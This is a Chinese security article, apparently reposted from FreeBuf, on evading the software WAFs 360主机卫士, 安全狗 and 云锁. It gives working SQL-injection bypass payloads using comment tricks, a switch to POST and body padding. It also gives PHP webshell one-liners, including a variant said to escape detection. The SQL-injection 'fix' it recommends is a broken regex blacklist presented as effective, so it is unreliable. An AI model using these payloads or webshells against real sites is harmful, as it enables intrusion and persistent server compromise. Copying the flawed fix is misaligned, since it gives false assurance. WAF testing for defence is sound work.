原文链接:http://www.freebuf.com/articles/network/150646.html
0×00 前言 现在软waf较为多,就在今年夏天苦逼挖洞的日子里经常遇到360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示: [/url] [url=http://image.3001.net/images/20171015/15080671177285.png] [/url] 看到以上三个拦截提示就让人头疼不已,欲罢不能。 so,就在网上搜索各种绕过waf的资料,终于我结合了网上的文章以及自己的测试思路,写下了这篇文章。 0×01 数据库特性
- /**/
- ;
- ‘
- “
- #
- –
- – +
- – -
- +
- -
复制代码+、-执行结果: [url=http://image.3001.net/images/20171015/15080677085847.png] –、– -、– +、#执行结果: [/url] /**/执行结果: [url=http://image.3001.net/images/20171015/1508067795436.png] 0×02 拦截情况sql注入代码:
- header('content-type:text/html;chaset=utf-8');
- ini_set('display_errors',1);
- $mysqli = new mysqli('localhost', 'root','','ow');
- $id = $_GET["id"];
- $sql = "select * from news where id=".$id;
- $result = $mysqli->query($sql);
- if($result === false){//执行失败
- echo $mysqli->error;
- echo $mysqli->errno;
- }
- else
- {
- echo '<h1>'.$sql.'<h1>';
- echo '<hr><table border="1px" align="center">';
- echo '<tr><th>ID</th><th>a</th><th>内容</th></tr>';
- while($row = $result->fetch_assoc()){
- echo '<tr>';
- echo '<td>'.$row['id'].'</td>';
- echo '<td>wait</td>';
- echo '<td>'.$row['content'].'</td>';
- echo '</tr>';
- }
- echo '</table>';
- }
- $mysqli->close();
复制代码360主机卫士测试: - ‘:不拦截
- “:不拦截
- and 1=1:拦截
- and 1:不拦截
- and 1 like 1:不拦截
- and/**/1=1:不拦截
- and ’1′=’1′:拦截
- and 1<>2:不拦截
- union select:拦截
- union/**/select:拦截
- union(select):拦截
- union+form:不拦截
复制代码 0×03 揣测匹配规则and匹配规则: 初步设想and匹配规则: and%20\d+=\d+: 根据以上正则,\d+是匹配多个数字,但是将数字改成字符串后还是被拦截。 进阶设想and匹配规则: and%20(.)+=(.)+: 本次设想规则,也可以证实了上述测试中的and 1=1,将请求包中的and%20′s’='s’改为and/**/’s'=’s',360主机卫士不会拦截 同样的将and/**/’s'=’s'改为and+’s'=’s’ 咱们同样将and+’s'=’s'改为and+1=1 这样咱们进阶设想and 1=1的匹配规则就可以相对来说是成立的,既然可以用这样的形式来进行绕过,咱们可以得出一种过waf的姿势了 我们可以使用布尔盲注得到网站表中的数据了。 首先来查看库名: 语句and+’ow’=database/**/() 查出了相对应的库名ow 当然咱们主要是以绕过软waf为主,所以这里的布尔盲注就不做详细的测试了 union select匹配规则 初步设想union%20select%20\d+,\d+ 咱们还是将%20替换掉,改为union+select+1,2 初步设想失败,咱们继续测试 进阶设想: union(.)+select(.)+\d+,\d+%20 这里还是匹配到了,基本上对于这样的匹配规则,已经是无从遁形了 我们的设想几乎没有任何错误,union select的匹配规则相对的来说基本上是这样了。 0×04 提交方式绕过可以看到数据包都是以GET方式传递的,咱们将GET提交方式改为POST,看看结果如何: 可以看到这里咱们将攻击PYLOAD执行过去之后,并没有被拦截,这个原理很简单,程序首先判断是什么方式请求 然后对应的拦截请求,我们发送POST请求的时候,在请求体中没有发现恶意攻击请求,然而并没有检测url上的攻 击POLOAD,所以就直接绕过了360主机卫士。当然不单单只是360主机卫士存在这个问题。 云锁: GET请求 POST请求 到此绕过360主机卫士就有了两种姿势,云锁也得到了1个姿势,最便捷的一个姿势 0×05 资源限制角度绕过这是众所周知、而又难以解决的问题。如果HTTP请求POST BODY太大,检测所有的内容,WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然,只需要在POST BODY前面添加许多无用数据,把攻击payload放在最后即可绕过WAF检测。 360安全卫士测试,将sql注入代码里的$GET["id"]改为$POST["id"],接着测试: 还是会被拦截,我们在攻击pyload之前加入较多的无用字符 我在攻击Pyload之前加入了789个字符后,360主机卫士并没又进行拦截,然后咱们将这里的无用字符用/**/包裹起来 我们将这里的无用字符精简一下,精简之后到485个字符及可绕过360主机卫士。 我们再来看看云锁 云锁遇到POST请求直接不用绕了。 安全狗: 安全狗的以这样的方式与360主机卫士类似。到此处为止360主机卫士有了3种姿势,安全狗有了第一种姿势,云锁有了两种姿势。 0×05 测试安全狗、云锁用/**/绕过我们已以数据库特性为主来进行测试,//执行出来就是一个空格,用//对安全狗、云锁来绕过并注入 对安全狗测试: Pyload:union//select//1,2 Pyload:union/*********/select/*********/1,2 测试到这里咱们在Pyload中加入字母,符号等等一些东西 Pyload:union/**sssssssssssssssss”‘*****/select/*****sssssssssssssssss”‘****/1,2 使用当前pyload成功的绕过了安全狗,咱们精简下pyload: Pyload:union/**“‘*****/select/*****”‘****/1,2 当我们将字符去掉之后,被拦截了,说明安全狗在匹配/**/的时候,会匹配符号不会匹配字符,改下Pyload Pyload:union/**s*****/select/*****s****/1,2 我们将这个*精简一下,得到如下Pyload Pyload:union/s**/select/s**/1,2 对于安全狗使用/*/绕过的时候,右边的必须大于或等于2个*号,中间的字符串必须大于或等于1个字母的时候即可绕过安全狗 云锁测试: 根据以上测试安全狗的姿势来测试云锁/*s**/ Pload:union/s**/select/s**/1,2 我们改一下Pyload,给它加上符号试试 Pyload:union/s’”/select/s’”/1,2
成功绕过云锁,精简下Pyload Pyload:union/’/select/’/1,2 对于云锁用/**/绕过的时候只要在其中加入‘就可以绕过 通过上面的绕过姿势,当360主机卫士、云锁、安全狗结合在一起的时候可得出如下姿势 Pyload:union/w’**/select/w’**/1,2 并将以上pyload通过post方式提交及可绕过。 0×06 SQL注入漏洞修复
- <?php
- header('content-type:text/html;chaset=utf-8');
- ini_set('display_errors',1);
- $mysqli = new mysqli('localhost', 'root','','ow');
- $id = $_GET["id"];
- $sql = "select * from news where id=".$id;
- $result = $mysqli->query($sql);
- if($result === false){//执行失败
- echo $mysqli->error;
- echo $mysqli->errno;
- }
- else
- {
- echo '<h1>'.$sql.'<h1>';
- echo '<hr><table border="1px" align="center">';
- echo '<tr><th>ID</th><th>a</th><th>内容</th></tr>';
- while($row = $result->fetch_assoc()){
- echo '<tr>';
- echo '<td>'.$row['id'].'</td>';
- echo '<td>wait</td>';
- echo '<td>'.$row['content'].'</td>';
- echo '</tr>';
- }
- echo '</table>';
- }
- $mysqli->close();
- ​
- ?>
复制代码 修复之后:
- <?php
- header('content-type:text/html;chaset=utf-8');
- ini_set('display_errors',1);
- $mysqli = new mysqli('localhost', 'root','','ow');
- $id = injection_defense($_GET["id"]);
- $sql = "select * from news where id=".$id;
- if($id)
- {
- $result = $mysqli->query($sql);
- if($result === false){//执行失败
- echo $mysqli->error;
- echo $mysqli->errno;
- }
- else
- {
- echo '<h1>'.$sql.'<h1>';
- echo '<hr><table border="1px" align="center">';
- echo '<tr><th>ID</th><th>a</th><th>内容</th></tr>';
- while($row = $result->fetch_assoc()){
- echo '<tr>';
- echo '<td>'.$row['id'].'</td>';
- echo '<td>wait</td>';
- echo '<td>'.$row['content'].'</td>';
- echo '</tr>';
- }
- echo '</table>';
- }
- }
- $mysqli->close();
- function injection_defense($str)
- {
- if(preg_match('/[all|select|union|update|delete|\/|*| |and|ascii|form|where|=|\'|"|order]+/i', $str))
- {
- echo '请勿恶意攻击';
- }
- else
- {
- return $str;
- }
- }
- ?>
复制代码这样就可以很有效的防止SQL注入 0×07 PHP一句话原理分析PHP一句话原型: - <?php @eval($_POST["ceshi"]);?>
复制代码一句话的原型可分为两部分 - @eval():函数部分
- $_POST["ceshi"]:传值部分
复制代码原理分析: 在还没有接触编程的时候,很想知道为什么一句话木马功能这么齐全呢?既可以上传文件也能下载文件,还能写入文件,这是为什么呢? 咱们以这个写入文件为主,其实实现各种功能都是使用语言中的内置函数来完成该功能。 file_put_contens():写入文件操作 函数使用file_put_contents(文件名,文件内容) 执行之后,当前目录中就出现了shateaa.php文件,访问看看是不是输出为1 0×08 PHP免杀一句话编写
- <?php @eval($_GET["a"]);?>:查杀
- <?php @eval($_POST["a"]);?>:查杀
- <?php @eval($_REQUEST["a"]);?>:查杀
- <?php @eval($_COOKIE["a"]);?>:查杀
- <?php @eval();?>:不查杀
- <?php @assert();?>:不查杀
复制代码根据以上查杀情况,我们得出一个结论:单个代码执行的函数安全狗是不会杀的, 只有当有了外界的可控传参的时候才会被杀掉。 咱们继续来测试,既然已经知道了,我们就可以就事论事,不让软waf检测到我们有传参即可
- <?php
- $arr = [$_POST["ceshi"],$_REQUEST["ceshi"]];
- @assert($arr[mt_rand(0,1)]);
- ?>
复制代码可绕过安全狗,360主机卫士。尽量不要使用eval代码执行函数,要使用和他功能相同的assert()函数,能完成相同的功能
0×09 关键字函数替换通过GET传递函数会被匹配到360主机卫士的关键函数里,所以我们只需要改为phpinfo/**/(),这样就可以绕过 通过POST传递关键函数可以直接绕过 0×10 总结一个好WAF并不是吹出来的,而是实践出来的。研究waf的绕过,并不是为了去攻击某某网站,而是为了提高waf的防御能力。 当然我们不能仅仅停留在一个层面上,更要明白其漏洞原理,在代码层面上就将其修复,而不是事事靠第三方软件的防御。究其 根本也希望做waf的厂商看到此类文章,修复自己waf存在的问题。
|